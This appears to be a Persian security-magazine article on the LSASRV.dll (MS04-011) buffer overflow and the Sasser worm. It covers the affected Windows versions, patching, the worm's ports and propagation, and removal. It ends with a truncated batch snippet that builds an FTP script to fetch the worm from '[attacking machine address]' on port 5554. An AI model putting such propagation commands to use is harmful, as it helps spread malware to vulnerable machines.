Professional Documents
Culture Documents
Lsasrv - DLL RPC Buffer Overflow Remote Exploit: Black - Devils B0ys Digital Network Security Group
Lsasrv - DLL RPC Buffer Overflow Remote Exploit: Black - Devils B0ys Digital Network Security Group
dll ﺣﻔﺮﻩ
1 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻣﻼﺣﻈﺎﺕ :
ﻻﺯﻡ ﺑﻪ ﺗﺬﮐﺮ ﺍﺳﺖ ﮐﻠﻴﻪ ﻣﻄﺎﻟﺐ ﮔﻔﺘﻪ ﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺻﺮﻓﺎ ﺟﻨﺒﻪ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﺩ.ﻭ ﻫﺮ ﮔﻮﻧﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﻏﻴﺮ ﺁﻣﻮﺯﺷﻲ ﺍﺯ ﺍﻳﻦ ﻣﻄﺎﻟﺐ ﺑﺮ ﻋﻬﺪﻩ ﺧﻮﺩ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ ﻭ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﻭ
ﻣﺪﻳﺮﻳﺖ ﺳﺎﻳﺖ ﺍﻣﻨﻴﺖ ﻭﺏ ﻫﻴﭻ ﮔﻮﻧﻪ ﻣﺴﻮﻭﻟﻴﺘﻲ ﺭﺍ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻋﻬﺪﻩ ﺩﺍﺭ ﻧﻤﻲ ﺑﺎﺷﺪ .
2 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﻣﻘﺪﻣﻪ :
ﺍﻳﻦ ﻳﮏ ﺩﺍﺳﺘﺎﻥ ﻋﻠﻤﻲ –ﺗﺨﻴﻠﻲ ﻧﻴﺴﺖ
ﻓﮑﺮ ﻣﻲ ﮐﻨﻢ ﺻﺒﺢ ﺭﻭﺯ ﻳﮑﻲ ﺍﺯ ﺭﻭﺯﻫﺎﻱ ﺍﻭﺍﺳﻂ ﻣﺎ ﻣﻪ ﻣﻴﻼﺩﻱ ﺑﻮﺩ .ﻣﻦ ﻣﺜﻞ ﺭﻭﺯﻫﺎﻱ ﺩﻳﮕﺮ ﺩﺭ
ﺣﺎﻝ ﺗﮑﻤﻴﻞ ﮔﺰﺍﺭﺵ ﺭﻭﺯﺍﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺪﻳﺮ ﺍﻣﻨﻴﺖ ﺷﺒﮑﻪ ﺑﻮﺩﻡ .ﺣﺘﻲ ﺯﻣﺎﻥ ﺁﻥ ﺣﺎﺩﺛﻪ ﺧﻮﺏ ﺑﻪ
ﻳﺎﺩﻡ ﻣﺎﻧﺪﻩ :ﺳﺎﻋﺖ .۱۰:۱۵
ﺑﻪ ﺧﺎﻃﺮ ﺍﻳﻨﮑﻪ ﻣﺠﺒﻮﺭ ﺷﺪﻳﻢ ﺑﺮﺍﻱ ﺑﺮﭘﺎ ﻧﮕﻪ ﺩﺍﺷﺘﻦ ﺳﺮﻭﺭﻫﺎ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﻭ ﺑﺎ Switchﺑﻪ
ﻃﻮﺭ ﺩﺳﺘﻲ ﺍﺯ ﻣﺪﺍﺭ ﺧﺎﺭﺝ ﮐﻨﻴﻢ ﺍﻟﺒﺘﻪ ﻣﻦ ﻣﻮﻗﻌﻲ ﻣﺘﻮﺟﻪ ﺣﺎﺩﺛﻪ ﺷﺪﻡ ﮐﻪ ﺑﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﮐﻪ
ﺧﻮﺩﻡ ﺩﺭ ﺣﺎﻝ ﺗﮑﻤﻴﻞ ﮔﺰﺍﺭﺵ ﺭﻭﺯﺍﻧﻪ ﺑﻮﺩﻡ ﭘﻴﻐﺎﻣﻲ ﻣﺒﻨﻲ ﺑﺮ Shutdownﺳﻴﺴﺘﻢ ﻇﺮﻑ ﻣﺪﺕ ۶۰
ﺛﺎﻧﻴﻪ ﻭ ﺍﻳﻨﮑﻪ ﻓﻮﺭﺍ ﺩﺍﺩﻩ ﻫﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﮐﻨﻴﺪ ﻇﺎﻫﺮ ﺷﺪ .ﺍﻟﺒﺘﻪ ﺑﺎ ﺍﻳﻨﮑﻪ ﻫﻨﻮﺯ ﻧﻤﻲ ﺩﺍﻧﺴﺘﻢ ﭼﻪ ﺍﺗﻔﺎﻗﻲ
ﺍﻓﺘﺎﺩﻩ ﻭ ﺑﺮﺍﻱ ﺍﻳﻨﮑﻪ ﺣﺪﺍﻗﻞ ﺯﺣﻤﺎﺗﻲ ﮐﻪ ﺑﺮﺍﻱ ﺁﻥ ﮔﺰﺍﺭﺵ ۳ﺻﻔﺤﻪ ﺍﻱ ﺑﻠﻨﺪ ﮐﺸﻴﺪﻩ ﺑﻮﺩﻡ ﺑﻪ ﻫﺪﺭ
ﻧﺮﻭﺩ ﺑﻪ ﺟﺎﻱ ﺩﺳﺖ ﭘﺎﭼﻪ ﺷﺪﻥ ﺑﻪ ﺧﻮﺩﻡ ﮔﻔﺘﻢ ﺍﻳﻦ ﭘﻴﻐﺎﻡ ﺑﻪ ﺧﺎﻃﺮ ﻫﺮ ﻋﻠﺘﻲ ﮐﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ ﻭ ﻫﺮ
ﭼﻪ ﺑﺎﺷﺪ ﺷﺒﻴﻪ Shutdownﮐﺮﺩﻥ ﺍﺯ ﺭﻭﻱ ﺳﻄﺮ ﻓﺮﻣﺎﻥ ﻫﺴﺖ! ﮐﻪ ﺑﺎ ﻓﺮﻣﺎﻥ ﺩﻳﮕﺮﻱ ﻣﻲ ﺷﻮﺩ ﺁﻥ
ﺭﺍ ﻟﻐﻮ ﻛﺮﺩ.ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻪ Runﺭﻓﺘﻢ ﻭ ﺑﺎ ﺩﺳﺘﻮ ﺭ Shutdown /aﺑﻪ ﻃﻮﺭ ﻣﻮﻗﺖ ﺍﺯ ﺧﺎﻣﻮﺵ
ﺷﺪﻥ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﮐﺮﺩﻡ
ﻭﻟﻲ ﻣﻲ ﺩﺍﻧﺴﺘﻢ ﺍﻳﻦ ﺭﺍﻩ ﺣﻞ ﺍﺳﺎﺳﻲ ﻧﻴﺴﺖ ﻭﻣﺸﮑﻞ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﺍﻳﻦ ﭼﻴﺰﻫﺎﺳﺖ ﻭ ﺣﺘﻤﺎ ﺍﻳﻦ
ﻣﻮﺿﻮﻉ ﻋﻠﺖ ﺩﻳﮕﻪ ﺍﻱ ﭘﺸﺘﺶ ﻫﺴﺖ . .ﻣﻮﺿﻮﻉ ﻣﻮﻗﻌﻲ ﺑﺮﺍﻳﻢ ﺭﻭﺷﻦ ﺗﺮﻭ ﺟﺪﻱ ﺗﺮ ﺷﺪ ﻭﻗﺘﻲ ﮐﻪ
ﺑﺨﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺎ ﺗﻤﺎﺱ ﺑﺎ ﻣﻦ ﺍﻋﻼﻡ ﮐﺮﺩﻧﺪ ﺑﻴﺸﺘﺮ ﮐﺎﺭﺑﺮﺍﻥ ﺷﺒﮑﻪ ﻣﺎ ﺩﭼﺎﺭ ﻫﻤﻴﻦ ﻣﺸﮑﻞ ﺷﺪﻧﺪ
ﻭﻧﻤﻴﺪﻭﻧﻨﺪ ﺑﺎﻳﺪ ﭼﻪ ﮐﺎﺭ ﮐﻨﻨﺪ .ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺭﺍ ﻫﻢ ﺑﮕﻮﻳﻢ ﮐﻪ ﺁﻥ ﻣﻮ ﻗﻊ ﻣﻦ ﻫﻢ ﻧﻤﻲ ﺩﺍﻧﺴﺘﻢ ﻋﻠﺖ ﺍﻳﻦ
ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﭼﻪ ﭼﻴﺰﻱ ﻫﺴﺖ ..ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺧﺎﻃﺮ Downﮐﺮﺩﻥ ﭼﻨﺪ ﺗﺎ ﺍﺯ ﺳﺮﻭﺭﻫﺎ ﺑﺎﺭﻩ
3 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﮐﺎﺭﻱ ﺭﻭﻱ ﺩﻳﮕﺮ ﺳﺮﻭﺭﻫﺎ ﺑﺎﻻ ﺭﻓﺘﻪ ﺑﻮﺩ ﻭ ﺷﺒﮑﻪ ﺧﻴﻠﻲ ﮐﻨﺪ ﺷﺪﻩ ﺑﻮﺩ ﻣﻦ ﺍﻭﻝ ﻓﮑﺮ ﮐﺮﺩﻡ ﻣﺎ ﺑﺎ ﻳﮏ
ﺣﻤﻠﻪ ) Disterbuted Denial of Services (DDoSﻣﻮﺍﺟﻪ ﺷﺪﻳﻢ ﺑﻌﺪﺍ ﻓﻬﻤﻴﺪﻡ ﺍﻥ ﻫﻤﻪ ﻣﺸﮑﻞ
ﭘﻴﺶ ﺍﻭﻣﺪﻩ ﺑﻪ ﺧﺎﻃﺮ ﻳﮏ Wormﺟﺪﻳﺪ ﺑﻮﺩ .
ﺑﻠﻪ ﺩﻭﺳﺘﺎﻥ ﺩﺭﺳﺖ ﺣﺪﺱ ﺯﺩﻳﺪ Worm Sasserﺣﺘﻤﺎ ﺷﻤﺎ ﻫﻢ ﺑﺎ ﺍﻳﻦ ﺩﻭﺳﺖ ۱۵ﮐﻴﻠﻮ ﺑﺎﻳﺘﻲ
ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﮐﺮﺩﻳﺪ ﺍﻟﺒﺘﻪ ﻣﻦ ﻭ ﺩﻭﺳﺘﺎﻧﻢ ﻗﺼﺪ ﻧﺪﺍﺭﻳﻢ ﺩﺭ ﺍﻳﻦ ﻣﻘﺎﻟﻪ ﺑﻪ ﻃﻮﺭ ﮐﺎﻣﻞ ﺳﺎﺧﺘﺎﺭ ﻭ
ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﮑﺮﺩ ﺍﻧﻮﺍﻉ ﺍﻳﻦ ﮐﺮﻡ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭ ﺑﺮﺍﻱ ﺷﻤﺎ ﺷﺮﺡ ﺑﺪﻳﻢ ﻓﻘﻂ ﺍﺷﺎﺭﻫﺎﻱ ﮐﻮﺗﺎﻩ ﺑﻪ ﺍﻭﻥ
ﻣﻲ ﮐﻨﻢ .ﺩﺭ ﺁﻥ ﺭﻭﺯﻫﺎ ﺍﻋﻼﻡ ﺷﺪ ﮐﻪ ﺍﻳﻦ ﮐﺮﻡ ﺍﺯ ﻳﮏ ﺍﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺩﺭ ﭘﺮﻭﺳﻪ Lsass.exeﺑﺮﺍﻱ
ﻧﻔﻮﺫ ﻭ ﮔﺴﺘﺮﺵ ﺧﻮﺩﺵ ﺑﺮ ﺭﻭﻱ ﺷﺒﮑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﮐﻨﺪ ﻣﻦ ﺑﺎ ﺷﻨﻴﺪﻥ ﺍﻳﻦ ﺧﺒﺮﻣﺒﻨﻲ ﻭﺟﻮﺩ ﺣﻔﺮﻩ
ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﺑﻪ ﻳﺎﺩ ﻳﮏ ﮔﺮﺍﺭﺵ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻥ ﮔﺮﻭﻩ ﺍﻣﻨﻴﺘﻲ eEyeﺍﻓﺘﺎﺩﻡ.
ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﮐﺮﺩﻩ ﺑﻮﺩﻧﺪ ﮐﻪ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻁ ﺑﻪ lsasrv.dllﮐﻪ ﺗﻮﺳﻂ lsass.exeﻣﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ ﻭ ﺑﺎ Buffer Overflowﮐﺮﺩﻥ ﺁﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺧﻄﺮ
ﺑﻴﻨﺪﺍﺯﻧﺪ .ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻫﻢ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻫﺸﺪﺍﺭ eEyeﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ ﭘﭻ ﻫﺎﻱ ﻫﻤﺎﻥ ﺣﻔﺮﻩ ﺭﺍ
ﺑﻪ ﺯﻭﺩﻱ ﻣﻨﺘﺸﺮ ﮐﺮﺩ .ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻡ ﮐﻪ ﺍﻳﻦ ﺟﻮﺍﻧﺎﻥ ﻫﮑﺮ ﺁﻟﻤﺎﻧﻲ ) ﮔﺮﻭﻩ
( NetSkyﺣﺘﻤﺎ ﺍﺯ ﻫﻤﻴﻦ ﺣﻔﺮﻩ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﮐﺮﻡ sasserﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩﻩ ﺍﻧﺪ ﻭﻟﻲ ﺩﺍﺳﺘﺎﻥ
ﺑﻪ ﻫﻤﻴﻦ ﺟﺎ ﺧﺘﻢ ﻧﻤﻲ ﺷﺪ .ﺑﺎ ﺗﺠﺮﺑﻪ ﺍﻱ ﮐﻪ ﺩﺭ ﺍﻳﻦ ﺳﺎﻝ ﻫﺎ ﺩﺍﺷﺘﻢ ﺑﻪ ﺧﻮﺩﻡ ﮔﻔﺘﻢ ﭘﺸﺖ ﻫﺮ ﮐﺮﻣﻲ
ﺣﻔﺮﻩ ﺍﻱ ﺍﺳﺖ ﻭ ﭘﺸﺖ ﻫﺮ ﺣﻔﺮﻩ ﺍﻱ Exploitﺍﻱ ﻫﻢ ﻫﺴﺖ .ﺑﺮﺍﻱ ﻫﮏ ﮐﺮﺩﻥ ﺍﺯ ﺁﻧﺠﺎ ﮐﻪ ﻫﮑﺮﻫﺎ
ﺍﺯ ﻫﺮ ﺣﻔﺮﻩ ﺟﺪﻳﺪﻱ ﺣﺪﺍﮐﺜﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﻣﻲ ﮐﻨﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺟﺎ ﮐﻪ ﻋﻤﺮ ﺍﻳﻦ ﮐﺮﻡ ﻫﻨﻮﺯ ﻫﻢ ﺑﻪ ﻳﮏ ﺳﺎﻝ
ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ ﻭ ۴-۳ﻣﺎﻩ ﮐﻪ ﺍﺯ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﻣﻲ ﮔﺬﺭﺩ ﭘﺲ ﺣﺘﻤﺎ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻩ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﮑﻪ
ﻫﺎ ﺩﺭ ﭼﻨﺪ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺎﺷﺪ .
ﮐﻪ ﻣﺸﻬﻮﺭ ﺷﺪﻩ ﺑﻪ ﺣﻔﺮﻩ lsassﻭ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﭘﭻ ﻧﺸﺪﻩ ﺑﺎ Microsoft KB835732ﮐﻪ ﺩﺭ
ﺑﻮﻟﺘﻦ ﺧﺒﺮﻱ ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ ﺑﺎ ﺷﻤﺎﺭﻩ MS04-11ﺷﺎﻣﻞ – )Win NT- WinXP(SP0-SP1
Win2k(SP1-SP4)-
Win Server 2003ﺩﺭ ﻧﺴﺨﻪ ﻫﺎﻱ ۳۲ﻭ ۶۴ﺑﻴﺖ ﺑﺎ ﺍﻳﻦ ﺍﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻗﺎﻳﻞ ﻧﻔﻮﺫ ﻫﺴﺘﻨﺪ ﺍﻟﺒﺘﻪ
ﺷﻤﺎ ﺑﺎ ﻧﺼﺐ ﭘﭻ ﻫﺎﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﺣﻔﺮﻩ ﻳﺎ ﺑﺎ ﺍﺭﺗﻘﺎﻱ ﺳﺮﻭﻳﺲ ﭘﮏ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺑﻪ
4 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
Service Pack v2ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﺮ ﮔﻮﻧﻪ ﺣﻤﻠﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻦ ﺣﻔﺮﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺧﻮﺩ
ﺟﻠﻮﮔﻴﺮﻱ ﺑﻪ ﻋﻤﻞ ﺁﻭﺭﻳﺪ .
ﺩﺭ ﺍﺑﺘﺪﺍ ﻗﺼﺪ ﺩﺍﺭﻡ ﺷﻤﺎ ﺭﺍ ﻣﻘﺪﺍﺭﻱ ﺑﺎ ﺳﺎﺧﺘﺎﺭ ﻋﻤﻠﮑﺮﺩ ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﻨﺎ ﮐﻨﻢ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﺭﺍﺣﺘﻲ
ﺭﺍ ﺩﺭﮎ ﮐﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﮐﻪ ﺷﺎﻳﺪ ﻗﺒﻼ ﺑﺎ ﺍﻳﻦ ﮐﺮﻡ ﺍﺷﻨﺎ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﺍﻳﻦ ﮐﺮﻡ ﻧﺤﻮﻩ ﮐﺎﺭ Exploit
ﺑﻌﺪ ﺍﺯ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﻴﻐﺎﻣﻲ ﻣﺒﻨﻲ ﺑﺮ Shutdownﺳﻴﺴﺘﻢ ﻇﺮﻑ ﻣﺪﺕ ۶۰ﺛﺎﻳﻨﻪ ﻧﻤﺎﻳﺶ
ﻣﻲ ﺩﻫﺪ.
ﺩﺭ ﺍﻏﻠﺐ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﮐﺮﻡ ﺑﺎ ﮐﺮﻡ ﻣﻌﺮﻭﻑ MS Blasterﻭ Lovesanﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮﺩ ﻭﻟﻲ
ﺑﺮﺍﺣﺘﻲ ﺍﺯ ﺭﻭﻱ ﻫﻤﻴﻦ ﭘﻴﻐﺎﻡ ﻣﻲ ﺷﻮﺩ ﺑﻪ ﺗﻔﺎﻭﺗﺸﺎﻥ ﭘﻲ ﺑﺮﺩ ﺍﻟﺒﺘﻪ ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻧﺴﺨﻪ ﻫﺎﻳﻲ
ﺍﺯ ﺍﻳﻦ ﮐﺮﻡ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻩ ﺍﺳﺖ ﮐﻪ ﺍﺯ ﻧﻈﺮ Source Codeﺗﻔﺎﻭﺕ ﭼﻨﺪﺍﻧﻲ ﺑﺎ sasserﻧﺪﺍﺭﻧﺪ
ﻭﻟﻲ ﺍﺯ ﻧﻈﺮ ﺷﮑﻞ ﻇﺎﻫﺮﻱ ﺑﺎ ﺁﻥ ﻓﺮﻕ ﺩﺍﺭﺩ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻧﺤﻮﻩ ﻱ ﮔﺴﺘﺮﺵ ﻭ ﻋﻤﻠﮑﺮﺩ ﺩﺭ ﺩﺍﺧﻞ
ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﻣﺜﻼ ﮐﺮﻣﻲ ﺗﻮﺳﻂ ﻓﺮﺩﻱ ﺑﻪ ﻧﺎﻡ Alias cycloneﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ
ﻫﻤﭽﻨﻴﻦ ﺍﻳﻦ ﻓﺮﺩ ﺍﺩﻋﺎ ﮐﺮﺩﻩ ﺍﺳﺖ ﮐﻪ ﻳﮏ ﺍﻳﺮﺍﻧﻲ ﺑﻮﺩﻩ ﻭ ﺍﺯ ﺟﻤﺎﻋﺖ ﻫﮑﺮﻫﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﺍﻳﺮﺍﻧﻲ
ﮐﻪ ﺩﺍﺭﺍﻱ ﻳﮏ ﻣﻘﺎﻡ ﺳﻴﺎﺳﻲ ﺩﺭ ﺍﻳﺮﺍﻥ ﻣﻲ ﺑﺎﺷﺪ ،ﺍﺳﺖ .ﺍﻳﻦ ﻛﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﭘﻮﺭﺕ TCP45ﻭﺍﺭﺩ
ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺩﺭ ﺻﻮﺭﺕ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻮﺩﻥ ﺳﻴﺴﺘﻢ ﻳﮏ ﮐﭙﻲ ﺍﺯ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ CYCLONE.EXE
ﺩﺭ ﺷﺎﺧﻪ Rootﺳﻴﺴﺘﻢ
Downloadﻣﻲ ﮐﻨﺪ ﺯﻣﺎﻥ ﺍﻳﻦ ﮐﺮﻡ ﻗﺎﺩﺭ ﺑﻪ ﺣﻤﻠﻪ ﺍﺳﺖ ﮐﻪ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ TFTP.EXEﺩﺭ
ﻫﺪﻑ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﺪ ﺳﭙﺲ ﺍﻳﻦ ﮐﺮﻡ ﺣﻤﻠﻪ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﮐﺮﺩﻩ ﻭ ﭘﺮﻭﺳﻪ Lsass.exeﺭﺍ ﮐﻪ
5 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
ﺍﻟﺒﺘﻪ ﻓﺮﺍﻳﻨﺪ Removalﺍﻳﻦ ﻛﺮﻡ ﻓﻘﻂ ﺩﺭ ﺣﺎﻟﺖ safe modeﺍﻣﮑﺎﻥ ﭘﺬﻳﺮ ﺍﺳﺖ ﺍﻟﺒﺘﻪ remove
ﮐﺮﺩﻥ ﺍﻳﻦ ﻛﺮﻡ ﺟﺪﻳﺪ ﺍﻣﮑﺎﻥ ﮐﻤﻲ ﻛﺎﺭ ﺩﺍﺭﺩ ﺯﻳﺮﺍ ﺑﺎﻋﺚ ﺍﺯ ﮐﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺩﺳﺘﻮﺭﺍﺕ ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﻗﺒﻴﻞ
msconfigﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﮐﺎﺭﺍﻓﺘﺎﺩﻥ ﻓﺎﻳﺮﻭﺍﻟﻬﺎ ﻭﻋﻤﻞ ﻧﮑﺮﺩﻥ ﺍﻧﺘﻲ ﻭﻳﺮﻭﺱ ﻫﺎﻳﻲ ﭼﻮﻥ Norton
ﻣﻲ ﺷﻮﺩ ﮐﻪ removalﮐﺮﺩﻥ ﺍﻳﻦ ﮐﺮﻡ ﺭﺍ ﺳﺨﺖ ﻣﻲ ﮐﻨﺪ ﻭ ﻣﻦ ﻧﻴﺰ ﻫﻤﺎﻧﻨﺪ ﻣﺘﺨﺼﺼﺎﻥ ﺑﺨﺶ
ﺍﻣﻨﻴﺖ ﮔﺮﻭﻩ Security Focusﻣﻌﺘﻘﺪﻡ ﮐﻪ ﺗﻨﻬﺎ ﺭﺍ ﺭﺍﺣﺖ ﺷﺪﻥ ﺍﺯ ﺩﺳﺖ ﺍﻳﻦ ﮐﺮﻡ ﻧﺼﺐ ﻣﺠﺪﺩ
ﻭﻳﻨﺪﻭﺯ ﻭ Patchﮐﺮﺩﻥ ﺣﻔﺮﻩ ﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ ﺍﺳﺖ .ﺩﺭ ﺿﻤﻦ ﻫﻴﭻ ﺁﻧﺘﻲ ﻭﻳﺮﻭﺳﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﺯ ﺑﻴﻦ
ﺑﺮﺩﻥ ﺍﻳﻦ ﻧﻮﻉ ﺍﺯ ﮐﺮﻣﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻴﺴﺘﻨﺪ ﺁﻟﺒﺘﻪ ﺍﮔﺮ ﻫﻨﻮﺯ ﺑﻪ ﺍﻳﻦ ﮐﺮﻡ ﻫﺎ ﺁﻟﻮﺩﻩ ﻧﺸﺪﻩ ﺍﻳﺪ ﭘﺲ ﻭﻗﺖ
lsasdrv.dllﻭ ﭘﺮﻭﺳﻪ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﺪﻫﻴﺪ ﻭﺑﺎ Disableﮐﺮﺩﻥ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺑﺮﻭﻱ
lsass.exeﺧﻮﺩ ﺭﺍ ﺍﺯ ﺧﻄﺮ ﺍﻳﻦ ﮐﺮﻡ ﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ .
ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﮑﻞ ﮐﻠﻲ ﺩﺳﺘﻮﺭﺍﺕ ﺯﻳﺮ IPﻫﺎﻱ ﻫﺪﻑ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻭ ﺷﺮﻭﻉ
ﺑﻪ ﮔﺴﺘﺮﺵ ﺧﻮﺩ ﺩﺭ ﺷﺒﮑﻪ ﻣﻲ ﻛﻨﻨﺪ .ﺍﻳﻦ ﮐﺮﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ FTP SERVERﺑﺮ ﺭﻭﻱ ﭘﻮﺭﺕ ۵۵۴
TCP/ﺑﻪ ﭼﮏ ﮐﺮﺩﻥ IPﻫﺎﻳﻲ ﮐﻪ ﺍﺯ ﻃﺮﻳﻖ Windows APIﺟﻤﻊ ﺁﻭﺭﻱ ﮐﺮﺩﻩ ﺍﺳﺖ ﺑﺮﺍﻱ ﭘﻲ
ﺑﺮﺩﻥ ﺑﻪ OnLineﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻭ ﺩﺭ ﺻﻮﺭﺕ ﻧﻔﻮﺫ ﭘﺬﻳﺮ ﺑﻮﺩﻥ ﻫﺮ ﻳﮏ ﺍﺯ IPﻫﺎ ،ﺍﺯ
ﻃﺮﻳﻖ ﭘﻮﺭﺕ ﻫﺎﻱ TCP/5554ﻭ TCP/9994ﺑﻪ ﺁ ﻥ ﺳﻴﺴﺘﻢ ﻫﺎﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻭﺻﻞ ﻣﻲ ﺷﻮﺩ
ﻭ ﺧﻮﺩ ﺭﺍ ﮔﺴﺘﺮﺵ ﻣﻲ ﺩﻫﺪ .
6 www.WebSecurityMgz.com
ﺣﻔﺮﻩ LSASRV.dllﻭ ﻧﺤﻮﻩ ﻧﻔﻮﺫ ﺑﻪ ﺳﺮﻭﺭﻫﺎﻱ ﻭﻳﻨﺪﻭﺯﻱ
echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
